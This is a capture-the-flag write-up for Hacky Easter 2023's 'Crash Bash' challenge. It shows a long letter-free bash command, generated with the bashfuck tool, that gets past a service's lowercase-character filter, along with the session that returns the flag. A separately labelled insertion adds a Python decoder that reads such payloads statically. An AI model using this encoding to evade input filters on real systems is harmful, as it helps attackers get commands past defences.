Crash Bash
Challenge
Can you crash the bash?
The password is B4sh_br0TH3rs
Connect using nc ch.hackyeaster.com 2303
Note: The service is restarted every hour at x:00.
Hint: Some characters are forbidden, in the whole string you enter.
Solution
We connect and quickly find out we cannot use any lowercase letters in our commands:
$ nc ch.hackyeaster.com 2303
Welcome to Crash Bash!
To get the flag, call /printflag.sh with the password!
Enter "q" to quit.
----------------------
crashbash$ a
Invalid input, bash crashed!
crashbash$ b
Invalid input, bash crashed!
crashbash$ 1
/bin/bash: line 1: 1: command not found
crashbash$ 2
/bin/bash: line 1: 2: command not found
crashbash$ _
/bin/bash: line 1: _: command not found
crashbash$ A
/bin/bash: line 1: A: command not found
crashbash$
So we have to find a way to call /printflag.sh B4sh_br0TH3rs without using any lowercase letters, hmm...
Luckily we find an AMAZING program called bashfuck which will do just that for us: convert any command to a version that doesn’t use any alphanumeric characters!
So we download it (copy here), and ask it to construct our command for us:
$ ./bashfuck.sh /printflag.sh B4sh_br0TH3rs
cmd: `/printflag.sh B4sh_br0TH3rs`
result (1960 byte): ${!#}<<<{$\'\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<${##}))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${
##}))#${##}$#${##}))$#\',$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}$#${##}))\\${##}$((${##}<<$((${##}<<${##}))))$(($((${##}<<${##}))#${##}${##}))\',
$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##
}<<${##}))#${##}$#${##}))${##}\\${##}$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${
##}<<${##}))))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$((${##}<<$((${##}<<${##}))))$((
$((${##}<<${##}))#${##}${##}${##}))\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${#
#}<<${##}))#${##}$#${##}))$#\\$#$((${##}<<$((${##}<<${##}))))$#\\${##}$#$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$
(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$#\\${##}$(($((${##}<<${##}))#${##}${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<
${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$((${##}<<${##}))$((${##}<<$((${##}<<${##}))))\\${##}${##}$#\\$#$(($((${##}<<${##}))#$
{##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\'}
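Added example, not part of the original write-up or of bashfuck: a static decoder that resolves the expansions in a payload of the shape shown above without executing anything, so you can see which command it carries. The function names and the constructed sample (which encodes `id -u`) are ours, and it assumes the shell has no positional parameters, so `$#` is 0.

```python
import re

# Constructed sample in the same style as the output above; it encodes the
# two words "id" and "-u" and contains no letters or digits at all.
SAMPLE = (
    r"${!#}<<<{$\'"
    r"\\${##}$(($((${##}<<${##}))#${##}$#${##}))${##}"                                # \151
    r"\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<$((${##}<<${##}))))"              # \144
    r"\',$\'"
    r"\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}$#${##}))"     # \055
    r"\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}$#${##}))"  # \165
    r"\'}"
)

# Innermost $((...)) holding only a number, a shift, or a base#digits literal.
ARITH = re.compile(r"\$\(\((\d+(?:<<\d+|#\d+)?)\)\)")
ANSI_C = re.compile(r"\$'((?:\\[0-7]{1,3})+)'")   # $'\NNN\NNN...' words
OCTAL = re.compile(r"\\([0-7]{1,3})")


def _arith(match):
    expr = match.group(1)
    if "#" in expr:                      # bash base#digits, e.g. 2#101 -> 5
        base, digits = expr.split("#")
        return str(int(digits, int(base)))
    if "<<" in expr:                     # left shift, e.g. 1<<2 -> 4
        left, shift = expr.split("<<")
        return str(int(left) << int(shift))
    return expr


def deobfuscate(payload):
    """Return (interpreter, argv) for a payload of this shape, without running it."""
    # ${!#} is indirect expansion of $#; with no arguments that is $0, the shell.
    s = payload.replace("${!#}", "$0")
    # Assumption: no positional parameters, so $# is 0 and ${##} (its length) is 1.
    s = s.replace("${##}", "1").replace("$#", "0")
    prev = None
    while prev != s:                                  # collapse arithmetic inside-out
        prev, s = s, ARITH.sub(_arith, s)
    s = re.sub(r"\\(.)", r"\1", s)                    # outer shell's backslash removal
    interpreter, _, body = s.partition("<<<")         # body goes to the shell's stdin
    argv = [OCTAL.sub(lambda m: chr(int(m.group(1), 8)), w) for w in ANSI_C.findall(body)]
    return interpreter, argv


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Before decoding the full output shown above, remove the line breaks that wrapping inserted inside it.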
And now we just connect to the service and enter our command:
$ nc ch.hackyeaster.com 2303
Welcome to Crash Bash!
To get the flag, call /printflag.sh with the password!
Enter "q" to quit.
----------------------
crashbash$ ${!#}<<<{$\'\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<${##}))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${
##}))#${##}$#${##}))$#\',$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}$#${##}))\\${##}$((${##}<<$((${##}<<${##}))))$(($((${##}<<${##}))#${##}${##}))\',
$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##
}<<${##}))#${##}$#${##}))${##}\\${##}$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${
##}<<${##}))))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$((${##}<<$((${##}<<${##}))))$((
$((${##}<<${##}))#${##}${##}${##}))\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${#
#}<<${##}))#${##}$#${##}))$#\\$#$((${##}<<$((${##}<<${##}))))$#\\${##}$#$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$
(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$#\\${##}$(($((${##}<<${##}))#${##}${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<
${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$((${##}<<${##}))$((${##}<<$((${##}<<${##}))))\\${##}${##}$#\\$#$(($((${##}<<${##}))#$
{##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\'}
Congrats, here's your flag:
he2023{gr34t_b4sh_succ3ss!}
crashbash$
Success!
Flag
he2023{gr34t_b4sh_succ3ss!}